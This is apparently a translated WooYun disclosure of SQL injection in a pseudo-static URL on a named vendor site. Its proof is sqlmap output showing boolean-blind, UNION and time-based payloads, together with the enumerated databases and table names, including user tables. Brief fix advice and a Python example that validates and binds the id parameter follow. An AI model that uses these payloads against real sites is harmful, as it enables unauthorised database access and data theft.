
SQL injection through a pseudo-static URL at a certain vendor

2014-11-09 21:00

appmfl.com/?informationshow/tp/211/id/15.html

Proof of vulnerability:

sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://appmfl.com:80/?informationshow/tp/211/id/15' AND 9133=9133 AND 'mDMQ'='mDMQ.html

    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: http://appmfl.com:80/?informationshow/tp/211/id/-1280' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7161676771,0x514d5754594d4b474d49,0x716f746b71)#.html

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://appmfl.com:80/?informationshow/tp/211/id/15' AND SLEEP(5) AND 'mcsb'='mcsb.html
---
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.1
back-end DBMS: MySQL 5.0.11
available databases [10]:
[*] cdcol
[*] data
[*] information_schema
[*] jinhe
[*] jinhe2
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://appmfl.com:80/?informationshow/tp/211/id/15' AND 9133=9133 AND 'mDMQ'='mDMQ.html

    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: http://appmfl.com:80/?informationshow/tp/211/id/-1280' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7161676771,0x514d5754594d4b474d49,0x716f746b71)#.html

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://appmfl.com:80/?informationshow/tp/211/id/15' AND SLEEP(5) AND 'mcsb'='mcsb.html
---
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.1
back-end DBMS: MySQL 5.0.11
Database: jinhe
[47 tables]
+---------------------+
| cn_case             |
| cn_down             |
| cn_faq              |
| cn_index_content    |
| cn_index_img        |
| cn_indexvisitrecord |
| cn_info             |
| cn_links            |
| cn_liuyan           |
| cn_seo              |
| cn_single           |
| cn_video            |
| mx_appcalist        |
| mx_appgroups        |
| mx_applivs          |
| mx_datasyndic       |
| mx_fieldatas        |
| mx_fields           |
| mx_fieldupload      |
| mx_filters          |
| mx_forms            |
| mx_killpoison       |
| mx_loginlogs        |
| mx_menu             |
| mx_mgroup           |
| mx_mod_advs         |
| mx_mod_blocks       |
| mx_mod_slots        |
| mx_mod_topic        |
| mx_mod_topicstyle   |
| mx_optlog_1312      |
| mx_optlog_1401      |
| mx_optlog_1402      |
| mx_optlog_1403      |
| mx_optlog_1404      |
| mx_optlog_1405      |
| mx_optlog_1406      |
| mx_optlog_1407      |
| mx_optlog_1408      |
| mx_outputsets       |
| mx_pickimport       |
| mx_picknode         |
| mx_picktemps        |
| mx_sitesearch       |
| mx_uploads          |
| mx_user             |
| mx_vip_user         |
+---------------------+



Fix recommendations:

1. Thoroughly check and filter the characters accepted by every input field.

2. Thoroughly search the system for backdoors.

3. Use a third-party firewall to harden the whole system.
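As an added example (not code from the report or from the affected site), a Python sketch of how a router for URLs of this shape can be fixed at the root: the `id` segment is accepted only as a whole decimal integer and then bound as a query parameter. The `cn_info` schema and sample row are constructed here; the three rejected inputs are the sqlmap payloads quoted above with the host removed and the UNION one abbreviated.

```python
import re
import sqlite3
from urllib.parse import unquote

# Route shape from the report: ?informationshow/tp/211/id/15.html
# (controller, alternating key/value segments, then a fake ".html" suffix).
ROUTE_RE = re.compile(r"^\?(?P<ctl>[a-z]+)(?P<kv>(?:/[a-z_]+/[^/]+)*)\.html$")

def parse_pseudo_static(query: str) -> dict:
    """Split a pseudo-static query into controller plus key/value params."""
    m = ROUTE_RE.match(unquote(query))
    if not m:
        raise ValueError("unexpected route shape")
    parts = m.group("kv").strip("/").split("/") if m.group("kv") else []
    return {"controller": m.group("ctl"), **dict(zip(parts[0::2], parts[1::2]))}

def safe_int(value: str) -> int:
    """Accept the whole value only if it is a plain decimal integer."""
    # "15" passes; "15' AND 9133=9133 AND 'mDMQ'='mDMQ" fails, whatever a
    # character blacklist would or would not have thought to strip.
    if not re.fullmatch(r"\d{1,10}", value):
        raise ValueError(f"id must be a positive integer, got {value!r}")
    return int(value)

def lookup_info(conn: sqlite3.Connection, query: str):
    info_id = safe_int(parse_pseudo_static(query).get("id", ""))
    # Bound parameter: the id reaches the DBMS as a value, never as SQL text.
    row = conn.execute("SELECT title FROM cn_info WHERE id = ?", (info_id,)).fetchone()
    return row[0] if row else None

def handle(conn: sqlite3.Connection, query: str) -> tuple:
    """Return ('ok', title) or ('rejected', reason), as a controller would."""
    try:
        return ("ok", lookup_info(conn, query))
    except ValueError as exc:
        return ("rejected", str(exc))

def demo_conn() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the site's cn_info table (assumed schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cn_info (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO cn_info VALUES (15, 'constructed sample article')")
    return conn

LEGIT = "?informationshow/tp/211/id/15.html"
PAYLOADS = [  # the sqlmap payloads quoted above, host removed, UNION abbreviated
    "?informationshow/tp/211/id/15' AND 9133=9133 AND 'mDMQ'='mDMQ.html",
    "?informationshow/tp/211/id/-1280' UNION ALL SELECT NULL,NULL,CONCAT(0x7161676771,0x716f746b71)#.html",
    "?informationshow/tp/211/id/15' AND SLEEP(5) AND 'mcsb'='mcsb.html",
]
```

Running `handle(demo_conn(), q)` for `LEGIT` returns the sample title, while every entry of `PAYLOADS` is rejected before any SQL is built.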

Source: www.wooyun.org/bugs/wooyun-2014-071952
